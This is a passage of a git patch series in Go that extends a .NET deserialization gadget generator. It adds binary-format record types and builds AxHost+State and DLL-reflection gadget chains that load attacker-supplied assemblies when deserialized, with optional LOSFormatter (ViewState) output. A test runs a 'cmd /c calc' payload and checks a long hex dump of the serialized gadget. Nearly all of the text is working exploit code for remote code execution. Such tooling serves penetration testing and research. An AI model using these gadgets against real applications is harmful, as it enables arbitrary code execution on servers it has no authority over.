 	firstMemberTypeInfo, ok := getMemberTypeInfo(firstMemberTypes, firstMemberNames, firstAdditionalInfo)
 	if !ok {
 		return "", false
@@ -1148,6 +2044,22 @@ func CreateObjectRef(url string, formatter string) (string, bool) {
 		MemberTypeInfo: firstMemberTypeInfo,
 	}
 
+	// SECOND CLASS, a value for the first one
+	var secondMemberValues []interface{}
+	secondClassName := "System.Runtime.Remoting.ObjRef"
+	secondMemberValues = append(secondMemberValues, BinaryObjectRecord{ObjectID: 3, Value: url})
+	secondMemberNames := []string{"url"}
+	secondMemberTypes := []string{"String"}
+	secondClassInfo := ClassInfo{
+		ObjectID:    2,
+		Name:        secondClassName,
+		MemberCount: len(secondMemberNames),
+		MemberNames: secondMemberNames,
+	}
+	secondMemberTypeInfo, ok := getMemberTypeInfo(secondMemberTypes, secondMemberNames, nil)
+	if !ok {
+		return "", false
+	}
 	secondSystemClassWithMembersAndTypesRecord := SystemClassWithMembersAndTypesRecord{
 		ClassInfo:      secondClassInfo,
 		MemberValues:   secondMemberValues,
diff --git a/dotnet/dotnetgadget_test.go b/dotnet/dotnetgadget_test.go
index 1a77b7b..5b8ddf8 100644
--- a/dotnet/dotnetgadget_test.go
+++ b/dotnet/dotnetgadget_test.go
@@ -194,3 +194,13 @@ func TestViewstateGeneration(t *testing.T) {
 		t.Fatalf("Invalid CreateViewstatePayload output... val: %q hexform: %02x\n", got, got)
 	}
 }
+
+func TestCreateAxHostStateDLL(t *testing.T) {
+	got, ok := CreateAxHostStateDLL("cmd", "/c calc") // generate using our own dotnet generator
+	if !ok {
+		t.Fatal("Could not generate payload")
+	}
+	if !ok || fmt.Sprintf("%02x", got) != "" {
+		t.Fatalf("Invalid CreateAxHostStateDLL output... val: %q hexform: %02x\n", got, got)
+	}
+}
diff --git a/dotnet/general_types.go b/dotnet/general_types.go
index c4d0ade..907b01c 100644
--- a/dotnet/general_types.go
+++ b/dotnet/general_types.go
@@ -16,15 +16,23 @@ type Primitive interface {
 }
 
 type (
-	PrimitiveInt16 int
-	PrimitiveInt32 int
-	PrimitiveByte  byte
+	PrimitiveInt16      int
+	PrimitiveInt32      int
+	PrimitiveByte       byte
+	PrimitiveByteString string
 )
 
 func (me PrimitiveInt16) PrimToString() string {
 	return transform.PackLittleInt16(int(me))
 }
 
+// A placeholder for lesser-used objects such as Single
+// Whatever you give it, will be placed in the stream exactly as given
+// Can't just pass a string because it will get 'processed' as a lengthPrefixedString, this avoids that
+func (me PrimitiveByteString) PrimToString() string {
+	return string(me)
+}
+
 func (me PrimitiveInt32) PrimToString() string {
 	return transform.PackLittleInt32(int(me))
 }
@@ -63,22 +71,23 @@ var RecordTypeEnumMap = map[string]int{
 
 // Binary type information that is used to define the type of each member of the class being defined.
 var BinaryTypeEnumerationMap = map[string]int{
-	"Primitive":      0,
+	"Primitive":      0, // Needs Add Info
 	"String":         1,
 	"Object":         2,
-	"SystemClass":    3,
-	"Class":          4,
+	"SystemClass":    3, // Needs Add Info
+	"Class":          4, // Needs Add Info
 	"ObjectArray":    5,
 	"StringArray":    6,
-	"PrimitiveArray": 7,
+	"PrimitiveArray": 7, // Needs Add Info
 }
 
 // The Primitive Type, must be added to additionalInfo array for each primitive class member that was defined in MemberTypes for a given object.
 // https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nrbf/4e77849f-89e3-49db-8fb9-e77ee4bc7214
 var PrimitiveTypeEnum = map[string]int{
-	"Boolean":  1,
-	"Byte":     2,
-	"Char":     3,
+	"Boolean": 1,
+	"Byte":    2,
+	"Char":    3,
+	// there is no 4 per https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-nrbf/4e77849f-89e3-49db-8fb9-e77ee4bc7214
 	"Decimal":  5,
 	"Double":   6,
 	"Int16":    7,
@@ -156,7 +165,7 @@ func getMemberTypeInfo(memberTypes []string, memberNames []string, additionalInf
 	for _, memberType := range memberTypes {
 		val, ok := BinaryTypeEnumerationMap[memberType] // Ensuring that they're valid types
 		if !ok {
-			output.PrintfFrameworkError("Failed to build MemberTypeInfo string: Invalid member type provided: %s", memberType)
+			output.PrintfFrameworkError("Failed to build MemberTypeInfo string: Invalid member type provided: %s, names: %q , all types: %s", memberType, memberNames, memberTypes)
 
 			return MemberTypeInfo{}, false
 		}
@@ -180,6 +189,7 @@ func getMemberTypeInfo(memberTypes []string, memberNames []string, additionalInf
 }
 
 // Gives us the expected expected binary string representation.
+// MemberTypeInfo output order: byteTypeEnums[]byte + []AdditionalInfo
 func (memberTypeInfo MemberTypeInfo) ToBin() (string, bool) {
 	dataSequence := ""
 	// build the array of binarytypeenums
diff --git a/dotnet/records.go b/dotnet/records.go
index 238b923..37ff2b1 100644
--- a/dotnet/records.go
+++ b/dotnet/records.go
@@ -16,6 +16,21 @@ type Record interface {
 	ToXML(ClassInfo, MemberTypeInfo, BinaryLibraryRecord, int, string) (MemberNode, bool)
 }
 
+type MemberPrimitiveTypedRecord struct {
+	PrimitiveTypeEnum int
+	Value             Primitive
+}
+
+type BinaryArrayRecord struct {
+	ObjectID            int
+	BinaryArrayTypeEnum int // 1byte
+	Rank                int // >=0
+	Lengths             []int
+	LowerBounds         []int
+	TypeEnum            int // 1byte
+	AdditionalTypeInfo  []interface{}
+}
+
 type ClassWithIDRecord struct {
 	ObjectID     int
 	MetadataID   int
@@ -50,6 +65,10 @@ type MemberReferenceRecord struct {
 	IDRef int
 }
 
+type ObjectNullMultiple256Record struct {
+	NullCount int
+}
+
 type ObjectNullRecord struct{}
 
 type BinaryObjectRecord struct {
@@ -73,10 +92,27 @@ type ArraySingleStringRecord struct {
 	Members   []interface{}
 }
 
+type ArraySingleObjectRecord struct {
+	ArrayInfo ArrayInfo
+	Members   []interface{}
+}
+
+func (objectNullMultiple256Record ObjectNullMultiple256Record) GetRecordType() int {
+	return RecordTypeEnumMap["ObjectNullMultiple256"]
+}
+
 func (arraySinglePrimitiveRecord ArraySinglePrimitiveRecord) GetRecordType() int {
 	return RecordTypeEnumMap["ArraySinglePrimitive"]
 }
 
+func (binaryArrayRecord BinaryArrayRecord) GetRecordType() int {
+	return RecordTypeEnumMap["BinaryArray"]
+}
+
+func (arraySingleObjectRecord ArraySingleObjectRecord) GetRecordType() int {
+	return RecordTypeEnumMap["ArraySingleObject"]
+}
+
 func (arraySingleStringRecord ArraySingleStringRecord) GetRecordType() int {
 	return RecordTypeEnumMap["ArraySingleString"]
 }
@@ -109,6 +145,10 @@ func (memberReferenceRecord MemberReferenceRecord) GetRecordType() int {
 	return RecordTypeEnumMap["MemberReference"] // must be 12 for binaryLibraryRecord
 }
 
+func (memberPrimitiveTypedRecord MemberPrimitiveTypedRecord) GetRecordType() int {
+	return RecordTypeEnumMap["MemberPrimitiveTyped"] // must be 12 for binaryLibraryRecord
+}
+
 func (objectNullRecord ObjectNullRecord) GetRecordType() int {
 	return RecordTypeEnumMap["ObjectNull"] // must be 12 for binaryLibraryRecord
 }
@@ -136,6 +176,30 @@ func (arraySinglePrimitiveRecord ArraySinglePrimitiveRecord) ToXML(_ ClassInfo,
 	return MemberNode{}, false
 }
 
+func (objectNullMultiple256Record ObjectNullMultiple256Record) ToXML(_ ClassInfo, _ MemberTypeInfo, _ BinaryLibraryRecord, _ int, _ string) (MemberNode, bool) {
+	output.PrintFrameworkError("ToXML for ObjectNullMultiple256Record not yet implemented")
+
+	return MemberNode{}, false
+}
+
+func (memberPrimitiveTypedRecord MemberPrimitiveTypedRecord) ToXML(_ ClassInfo, _ MemberTypeInfo, _ BinaryLibraryRecord, _ int, _ string) (MemberNode, bool) {
+	output.PrintFrameworkError("ToXML for MemberPrimitiveTypedRecord not yet implemented")
+
+	return MemberNode{}, false
+}
+
+func (binaryArrayRecord BinaryArrayRecord) ToXML(_ ClassInfo, _ MemberTypeInfo, _ BinaryLibraryRecord, _ int, _ string) (MemberNode, bool) {
+	output.PrintFrameworkError("ToXML for BinaryArrayRecord not yet implemented")
+
+	return MemberNode{}, false
+}
+
+func (arraySingleObjectRecord ArraySingleObjectRecord) ToXML(_ ClassInfo, _ MemberTypeInfo, _ BinaryLibraryRecord, _ int, _ string) (MemberNode, bool) {
+	output.PrintFrameworkError("ToXML for ArraySingleObjectRecord not yet implemented")
+
+	return MemberNode{}, false
+}
+
 func (arraySingleStringRecord ArraySingleStringRecord) ToXML(_ ClassInfo, _ MemberTypeInfo, _ BinaryLibraryRecord, _ int, _ string) (MemberNode, bool) {
 	output.PrintFrameworkError("ToXML for ArraySingleStringRecord not yet implemented")
 
@@ -232,6 +296,90 @@ func (arraySingleStringRecord ArraySingleStringRecord) ToRecordBin() (string, bo
 	return recordByteString + objectIDString + memberCount + memberValuesString, true
 }
 
+func (binaryArrayRecord BinaryArrayRecord) ToRecordBin() (string, bool) {
+	recordByteString := string(byte(binaryArrayRecord.GetRecordType()))
+	objectIDString := transform.PackLittleInt32(binaryArrayRecord.ObjectID)
+	binTypeEnumString := string(byte(binaryArrayRecord.BinaryArrayTypeEnum))
+	rankString := transform.PackLittleInt32(binaryArrayRecord.Rank)
+	var lengthsString string
+	for _, length := range binaryArrayRecord.Lengths {
+		lengthsString += transform.PackLittleInt32(length)
+	}
+
+	var lowerBoundsString string // only necessary for certain types
+	if binaryArrayRecord.BinaryArrayTypeEnum > 2 {
+		for _, bound := range binaryArrayRecord.LowerBounds {
+			lowerBoundsString += transform.PackLittleInt32(bound)
+		}
+	}
+
+	var addInfoString string
+	for _, addInfo := range binaryArrayRecord.AdditionalTypeInfo {
+		if addInfo == nil {
+			output.PrintFrameworkError("Nil additional info provided")
+
+			return "", false
+		}
+
+		typeInt, ok := addInfo.(int) // it seems these are primitive type enum values
+		if ok {
+			addInfoString += string(byte(typeInt))
+
+			continue
+		}
+
+		stringInput, ok := addInfo.(string)
+		if ok {
+			addInfoString += lengthPrefixedString(stringInput)
+
+			continue
+		}
+
+		// handling ClassTypeInfo used for 'Class' type
+		classTypeInfo, ok := addInfo.(ClassTypeInfo)
+		if ok {
+			addInfoString += lengthPrefixedString(classTypeInfo.TypeName)
+			addInfoString += transform.PackLittleInt32(classTypeInfo.LibraryID)
+
+			continue
+		}
+		output.PrintfFrameworkError("Unsupported additional info type provided %q", addInfo)
+
+		return "", false
+	}
+
+	return recordByteString + objectIDString + binTypeEnumString + rankString + lengthsString + lowerBoundsString + string(byte(binaryArrayRecord.TypeEnum)) + addInfoString, true
+}
+
+func (arraySingleObjectRecord ArraySingleObjectRecord) ToRecordBin() (string, bool) {
+	recordByteString := string(byte(arraySingleObjectRecord.GetRecordType()))
+	objectIDString := transform.PackLittleInt32(arraySingleObjectRecord.ArrayInfo.ObjectID)
+	memberCount := transform.PackLittleInt32(arraySingleObjectRecord.ArrayInfo.MemberCount)
+
+	// handle member values
+	memberValuesString := ""
+	for _, member := range arraySingleObjectRecord.Members {
+		memberRecord, ok := member.(Record)
+		if ok {
+			recordBinString, ok := memberRecord.ToRecordBin()
+			if !ok {
+				return "", false
+			}
+			memberValuesString += recordBinString
+
+			continue
+		}
+		//memberString, ok := member.(string)
+		//if ok {
+		//memberValuesString += memberString
+
+		//continue
+		//}
+	}
+
+	return recordByteString + objectIDString + memberCount + memberValuesString, true
+}
+
 func (arraySinglePrimitiveRecord ArraySinglePrimitiveRecord) ToRecordBin() (string, bool) {
 	recordByteString := string(byte(arraySinglePrimitiveRecord.GetRecordType()))
 	objectIDString := transform.PackLittleInt32(arraySinglePrimitiveRecord.ArrayInfo.ObjectID)
@@ -241,6 +389,25 @@ func (arraySinglePrimitiveRecord ArraySinglePrimitiveRecord) ToRecordBin() (stri
 	return recordByteString + objectIDString + memberCount + primitiveTypeString + arraySinglePrimitiveRecord.Members, true
 }
 
+func (objectNullMultiple256Record ObjectNullMultiple256Record) ToRecordBin() (string, bool) {
+	recordByteString := string(byte(objectNullMultiple256Record.GetRecordType()))
+	nullCountString := string(byte((objectNullMultiple256Record.NullCount)))
+	if objectNullMultiple256Record.NullCount > 255 || objectNullMultiple256Record.NullCount < 0 {
+		output.PrintFrameworkError("Invalid value for objectNullMultiple256Record.NullCount, MUST be between 0-255 (inclusive)")
+		return "", false
+	}
+
+	return recordByteString + nullCountString, true
+}
+
+func (memberPrimitiveTypedRecord MemberPrimitiveTypedRecord) ToRecordBin() (string, bool) {
+	recordByteString := string(byte(memberPrimitiveTypedRecord.GetRecordType()))
+	typeEnumString := string([]byte{byte(memberPrimitiveTypedRecord.PrimitiveTypeEnum)})
+	valueString := memberPrimitiveTypedRecord.Value.PrimToString()
+
+	return recordByteString + typeEnumString + valueString, true
+}
+
 func (memberReferenceRecord MemberReferenceRecord) ToRecordBin() (string, bool) {
 	recordByteString := string(byte(memberReferenceRecord.GetRecordType()))
 	idRefString := transform.PackLittleInt32(memberReferenceRecord.IDRef)

From 3bd1e882131db7167b741507895b3c1b5b51f969 Mon Sep 17 00:00:00 2001
From: lobsterjerusalem <work@nday.dev>
Date: Fri, 25 Jul 2025 03:23:20 -0600
Subject: [PATCH 3/7] new gadget works

---
 dotnet/dotnetgadget.go      | 47 +++++++++++++++++++++++++------------
 dotnet/dotnetgadget_test.go | 11 +++++++--
 2 files changed, 41 insertions(+), 17 deletions(-)

diff --git a/dotnet/dotnetgadget.go b/dotnet/dotnetgadget.go
index 973c7c3..fb0e8c3 100644
--- a/dotnet/dotnetgadget.go
+++ b/dotnet/dotnetgadget.go
@@ -109,17 +109,17 @@ func IsValidXML(data []byte) bool {
 	return xml.Unmarshal(data, new(interface{})) == nil
 }
 
-func CreateAxHostStateDLL(program string, args string) (string, bool) {
+func CreateAxHostStateDLL(DLLBytes []byte, formatter string) (string, bool) {
 	binaryLibrary := BinaryLibraryRecord{ID: 2, Library: "System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"}
 	className := "System.Windows.Forms.AxHost+State"
 	memberNames := []string{"PropertyBagBinary"}
-	additionalInfo := []interface{}{PrimitiveTypeEnum["PrimitiveArray"]}
+	additionalInfo := []interface{}{PrimitiveTypeEnum["Byte"]}
 	memberValues := []interface{}{MemberReferenceRecord{IDRef: 3}}
 	memberTypes := []string{
-		"Object",
+		"PrimitiveArray",
 	}
 
-	innerNewGadget, ok := CreateDLLReflection([]byte("nonsense-placeholder"))
+	innerNewGadget, ok := CreateDLLReflection(DLLBytes, BinaryFormatter)
 	if !ok {
 		return "", false
 	}
@@ -153,10 +153,19 @@ func CreateAxHostStateDLL(program string, args string) (string, bool) {
 	}
 
 	payload := serializationHeaderRecordString + binLibString + classWithMembersAndTypesString + arraySinglePrimitiveRecordString + string(byte(RecordTypeEnumMap["MessageEnd"]))
-	return payload, true
+
+	switch formatter {
+	case LOSFormatter:
+		return FormatLOS(payload), true
+	case BinaryFormatter:
+		return payload, true
+	default:
+		output.PrintFrameworkError("Invalid formatter chosen, this formatter supports: 'LOSFormatter', and 'BinaryFormatter'")
+		return "", false
+	}
 }
 
-func CreateDLLReflection(DLLBytes []byte) (string, bool) {
+func CreateDLLReflection(DLLBytes []byte, formatter string) (string, bool) {
 	// This one is so large that it makes more sense to just build the "final" gadget as we go, so that's what is going to happen with this one.
 	var finalGadget string
 	var records []Record
@@ -306,7 +315,7 @@ func CreateDLLReflection(DLLBytes []byte) (string, bool) {
 		PrimitiveTypeEnum["Single"],
 		PrimitiveTypeEnum["Int32"],
 		"System.Collections.IComparer",
-		"$System.Collections.IHashCodeProvider",
+		"System.Collections.IHashCodeProvider",
 		PrimitiveTypeEnum["Int32"],
 	})
 	if !ok {
@@ -315,7 +324,7 @@ func CreateDLLReflection(DLLBytes []byte) (string, bool) {
 	systemClassWithMembersAndTypesID12 := SystemClassWithMembersAndTypesRecord{
 		ClassInfo: ClassInfo{
 			ObjectID:    12,
-			Name:        "System.Collection.Hashtable",
+			Name:        "System.Collections.Hashtable",
 			MemberCount: len(ID12MemberNames),
 			MemberNames: ID12MemberNames,
 		},
@@ -358,7 +367,7 @@ func CreateDLLReflection(DLLBytes []byte) (string, bool) {
 		},
 		MemberTypeInfo: ID15MemberTypeInfo,
 		MemberValues: []interface{}{
-			BinaryObjectRecord{ObjectID: 33, Value: "System.Linq.Enumerable+WhereSelectEnumerableIterator`2[[System.Byte[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Reflection.Assembly,     mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]"},
+			BinaryObjectRecord{ObjectID: 33, Value: "System.Linq.Enumerable+WhereSelectEnumerableIterator`2[[System.Byte[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Reflection.Assembly, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]"},
 			PrimitiveInt32(4),
 			BinaryObjectRecord{ObjectID: 34, Value: "System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"},
 		},
@@ -543,9 +552,9 @@ func CreateDLLReflection(DLLBytes []byte) (string, bool) {
 			MemberReferenceRecord{IDRef: 8},
 			MemberPrimitiveTypedRecord{PrimitiveTypeEnum: PrimitiveTypeEnum["Int32"], Value: PrimitiveInt32(0)},
 			MemberPrimitiveTypedRecord{PrimitiveTypeEnum: PrimitiveTypeEnum["Int32"], Value: PrimitiveInt32(10)},
-			MemberPrimitiveTypedRecord{PrimitiveTypeEnum: PrimitiveTypeEnum["Bool"], Value: PrimitiveByte(0)}, // PrimitiveByte "renders" the same. This should get cleaned up later
-			MemberPrimitiveTypedRecord{PrimitiveTypeEnum: PrimitiveTypeEnum["Bool"], Value: PrimitiveByte(0)},
-			MemberPrimitiveTypedRecord{PrimitiveTypeEnum: PrimitiveTypeEnum["Bool"], Value: PrimitiveByte(0)},
+			MemberPrimitiveTypedRecord{PrimitiveTypeEnum: PrimitiveTypeEnum["Boolean"], Value: PrimitiveByte(0)}, // PrimitiveByte "renders" the same. This should get cleaned up later
+			MemberPrimitiveTypedRecord{PrimitiveTypeEnum: PrimitiveTypeEnum["Boolean"], Value: PrimitiveByte(0)},
+			MemberPrimitiveTypedRecord{PrimitiveTypeEnum: PrimitiveTypeEnum["Boolean"], Value: PrimitiveByte(0)},
 			MemberPrimitiveTypedRecord{PrimitiveTypeEnum: PrimitiveTypeEnum["Int32"], Value: PrimitiveInt32(0)},
 		},
 	}
@@ -563,7 +572,7 @@ func CreateDLLReflection(DLLBytes []byte) (string, bool) {
 			4,
 			BinaryObjectRecord{
 				ObjectID: 58,
-				Value:    "ISystem, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
+				Value:    "System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
 			},
 		},
 	}
@@ -1002,7 +1011,7 @@ func CreateDLLReflection(DLLBytes []byte) (string, bool) {
 		MemberTypeInfo: ID130MemberTypeInfo,
 		MemberValues: []interface{}{
 			PrimitiveInt32(1959924499), //  expected hex ref just in case I screwed this up: 13 13 d2 74
-			PrimitiveInt16(15086),      //  expected hex ref ee 2a
+			PrimitiveInt16(10990),      //  expected hex ref ee 2a
 			PrimitiveInt16(4561),       // expected hex ref d1 11
 			PrimitiveByte(0x8b),
 			PrimitiveByte(0xfb),
@@ -1026,7 +1035,15 @@ func CreateDLLReflection(DLLBytes []byte) (string, bool) {
 	}
 	finalGadget += string(byte(RecordTypeEnumMap["MessageEnd"]))
 
-	return finalGadget, true
+	switch formatter {
+	case LOSFormatter:
+		return FormatLOS(finalGadget), true
+	case BinaryFormatter:
+		return finalGadget, true
+	default:
+		output.PrintFrameworkError("Invalid formatter chosen, this formatter supports: 'LOSFormatter', and 'BinaryFormatter'")
+		return "", false
+	}
 }
 
 func CreateDataSetXMLDiffGram(program string, args string) (string, bool) {
diff --git a/dotnet/dotnetgadget_test.go b/dotnet/dotnetgadget_test.go
index 5b8ddf8..2cde725 100644
--- a/dotnet/dotnetgadget_test.go
+++ b/dotnet/dotnetgadget_test.go
@@ -196,11 +196,18 @@ func TestViewstateGeneration(t *testing.T) {
 }
 
 func TestCreateAxHostStateDLL(t *testing.T) {
-	got, ok := CreateAxHostStateDLL("cmd", "/c calc") // generate using our own dotnet generator
+	got, ok := CreateAxHostStateDLL([]byte("nonsense"), LOSFormatter) // generate using our own dotnet generator
 	if !ok {
 		t.Fatal("Could not generate payload")
 	}
-	if !ok || fmt.Sprintf("%02x", got) != "" {
+	if !ok || fmt.Sprintf("%02x", got) != "ff0132903d0001000000ffffffff01000000000000000c020000005753797374656d2e57696e646f77732e466f726d732c2056657273696f6e3d342e302e302e302c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d6237376135633536313933346530383905010000002153797374656d2e57696e646f77732e466f726d732e4178486f73742b5374617465010000001150726f706572747942616742696e61727907020200000009030000000f03000000cf1d0000020001000000ffffffff010000000000000004010000007f53797374656d2e436f6c6c656374696f6e732e47656e657269632e4c69737460315b5b53797374656d2e4f626a6563742c206d73636f726c69622c2056657273696f6e3d342e302e302e302c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d623737613563353631393334653038395d5d03000000065f6974656d73055f73697a65085f76657273696f6e050000080809020000000a0000000a0000001002000000100000000903000000090400000009050000000906000000090700000009080000000909000000090a000000090b000000090c0000000d0607030000000101000000010000000702090d0000000c0e0000006153797374656d2e576f726b666c6f772e436f6d706f6e656e744d6f64656c2c2056657273696f6e3d342e302e302e302c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d3331626633383536616433363465333505040000006a53797374656d2e576f726b666c6f772e436f6d706f6e656e744d6f64656c2e53657269616c697a6174696f6e2e4163746976697479537572726f6761746553656c6563746f722b4f626a656374537572726f676174652b4f626a65637453657269616c697a65645265660200000004747970650b6d656d626572446174617303051f53797374656d2e556e69747953657269616c697a6174696f6e486f6c6465720e000000090f0000000910000000010500000004000000091100000009120000000106000000040000000913000000091400000001070000000400000009150000000916000000010800000004000000091700000009180000000109000000040000000919000000091a000000010a00000004000000091b000000091c000000010b00000004000000091d000000091e000000040c0000001c53797374656d2e436f6c6c656374696f6e732e486173687461626c65070000000a4c6f6164466163746f720756657273696f6e08436f6d70617265721048617368436f646550726f7669646572084861736853697a65044b6579730656616c756573000003030005050b081c53797374656d2e436f6c6c656374696f6e732e49436f6d70617265722453797374656d2e436f6c6c656374696f6e732e4948617368436f646550726f766964657208ec51383f020000000a0a03000000091f00000009200000000f0d00000008000000026e6f6e73656e7365040f0000001f53797374656d2e556e69747953657269616c697a6174696f6e486f6c64657203000000044461746109556e697479547970650c417373656d626c794e616d65010001080621000000fe0153797374656d2e4c696e712e456e756d657261626c652b576865726553656c656374456e756d657261626c654974657261746f7260325b5b53797374656d2e427974655b5d2c206d73636f726c69622c2056657273696f6e3d342e302e302e302c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d623737613563353631393334653038395d2c5b53797374656d2e5265666c656374696f6e2e417373656d626c792c206d73636f726c69622c2056657273696f6e3d342e302e302e302c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d623737613563353631393334653038395d5d0400000006220000004e53797374656d2e436f72652c2056657273696f6e3d342e302e302e302c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d6237376135633536313933346530383910100000000700000009030000000a09240000000a0808000000000a08080100000001110000000f0000000625000000f50253797374656d2e4c696e712e456e756d657261626c652b576865726553656c656374456e756d657261626c654974657261746f7260325b5b53797374656d2e5265666c656374696f6e2e417373656d626c792c206d73636f726c69622c2056657273696f6e3d342e302e302e302c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d623737613563353631393334653038395d2c5b53797374656d2e436f6c6c656374696f6e732e47656e657269632e49456e756d657261626c6560315b5b53797374656d2e547970652c206d73636f726c69622c2056657273696f6e3d342e302e302e302c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d623737613563353631393334653038395d5d2c206d73636f726c69622c2056657273696f6e3d342e302e302e302c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d623737613563353631393334653038395d5d04000000092200000010120000000700000009040000000a09280000000a0808000000000a08080100000001130000000f0000000629000000df0353797374656d2e4c696e712e456e756d657261626c652b576865726553656c656374456e756d657261626c654974657261746f7260325b5b53797374656d2e436f6c6c656374696f6e732e47656e657269632e49456e756d657261626c6560315b5b53797374656d2e547970652c206d73636f726c69622c2056657273696f6e3d342e302e302e302c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d623737613563353631393334653038395d5d2c206d73636f726c69622c2056657273696f6e3d342e302e302e302c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d623737613563353631393334653038395d2c5b53797374656d2e436f6c6c656374696f6e732e47656e657269632e49456e756d657261746f7260315b5b53797374656d2e547970652c206d73636f726c69622c2056657273696f6e3d342e302e302e302c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d623737613563353631393334653038395d5d2c206d73636f726c69622c2056657273696f6e3d342e302e302e302c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d623737613563353631393334653038395d5d04000000092200000010140000000700000009050000000a092c0000000a0808000000000a08080100000001150000000f000000062d000000e60253797374656d2e4c696e712e456e756d657261626c652b576865726553656c656374456e756d657261626c654974657261746f7260325b5b53797374656d2e436f6c6c656374696f6e732e47656e657269632e49456e756d657261746f7260315b5b53797374656d2e547970652c206d73636f726c69622c2056657273696f6e3d342e302e302e302c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d623737613563353631393334653038395d5d2c206d73636f726c69622c2056657273696f6e3d342e302e302e302c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d623737613563353631393334653038395d2c5b53797374656d2e547970652c206d73636f726c69622c2056657273696f6e3d342e302e302e302c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d623737613563353631393334653038395d5d0400000009220000001016000000070000000906000000093000000009310000000a0808000000000a08080100000001170000000f0000000632000000ef0153797374656d2e4c696e712e456e756d657261626c652b576865726553656c656374456e756d657261626c654974657261746f7260325b5b53797374656d2e547970652c206d73636f726c69622c2056657273696f6e3d342e302e302e302c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d623737613563353631393334653038395d2c5b53797374656d2e4f626a6563742c206d73636f726c69622c2056657273696f6e3d342e302e302e302c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d623737613563353631393334653038395d5d04000000092200000010180000000700000009070000000a09350000000a0808000000000a08080100000001190000000f00000006360000002953797374656d2e5765622e55492e576562436f6e74726f6c732e506167656444617461536f757263650400000006370000004d53797374656d2e5765622c2056657273696f6e3d342e302e302e302c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d62303366356637663131643530613361101a00000007000000090800000008080000000008080a000000080100080100080100080800000000011b0000000f00000006390000002953797374656d2e436f6d706f6e656e744d6f64656c2e44657369676e2e44657369676e65725665726204000000063a0000004953797374656d2c2056657273696f6e3d342e302e302e302c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d62373761356335363139333465303839101c000000050000000d02093b000000080803000000090b000000011d0000000f000000063d0000003453797374656d2e52756e74696d652e52656d6f74696e672e4368616e6e656c732e41676772656761746544696374696f6e61727904000000063e0000004b6d73636f726c69622c2056657273696f6e3d342e302e302e302c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d62373761356335363139333465303839101e000000010000000909000000101f00000002000000090a000000090a000000102000000002000000064100000000094100000004240000002253797374656d2e44656c656761746553657269616c697a6174696f6e486f6c646572020000000844656c6567617465076d6574686f643003033053797374656d2e44656c656761746553657269616c697a6174696f6e486f6c6465722b44656c6567617465456e7472792f53797374656d2e5265666c656374696f6e2e4d656d626572496e666f53657269616c697a6174696f6e486f6c6465720942000000094300000001280000002400000009440000000945000000012c000000240000000946000000094700000001300000002400000009480000000949000000013100000024000000094a000000094b000000013500000024000000094c000000094d000000013b00000004000000094e000000094f00000004420000003053797374656d2e44656c656761746553657269616c697a6174696f6e486f6c6465722b44656c6567617465456e74727907000000047479706508617373656d626c79067461726765741274617267657454797065417373656d626c790e746172676574547970654e616d650a6d6574686f644e616d650d64656c6567617465456e747279010102010101033053797374656d2e44656c656761746553657269616c697a6174696f6e486f6c6465722b44656c6567617465456e7472790650000000d50153797374656d2e46756e6360325b5b53797374656d2e427974655b5d2c206d73636f726c69622c2056657273696f6e3d342e302e302e302c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d623737613563353631393334653038395d2c5b53797374656d2e5265666c656374696f6e2e417373656d626c792c206d73636f726c69622c2056657273696f6e3d342e302e302e302c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d623737613563353631393334653038395d5d093e0000000a093e00000006520000001a53797374656d2e5265666c656374696f6e2e417373656d626c790653000000044c6f61640a04430000002f53797374656d2e5265666c656374696f6e2e4d656d626572496e666f53657269616c697a6174696f6e486f6c64657207000000044e616d650c417373656d626c794e616d6509436c6173734e616d65095369676e61747572650a5369676e6174757265320a4d656d626572547970651047656e65726963417267756d656e747301010101010003080d53797374656d2e547970655b5d0953000000093e000000095200000006560000002753797374656d2e5265666c656374696f6e2e417373656d626c79204c6f616428427974655b5d2906570000002e53797374656d2e5265666c656374696f6e2e417373656d626c79204c6f61642853797374656d2e427974655b5d29080000000a0144000000420000000658000000cc0253797374656d2e46756e6360325b5b53797374656d2e5265666c656374696f6e2e417373656d626c792c206d73636f726c69622c2056657273696f6e3d342e302e302e302c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d623737613563353631393334653038395d2c5b53797374656d2e436f6c6c656374696f6e732e47656e657269632e49456e756d657261626c6560315b5b53797374656d2e547970652c206d73636f726c69622c2056657273696f6e3d342e302e302e302c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b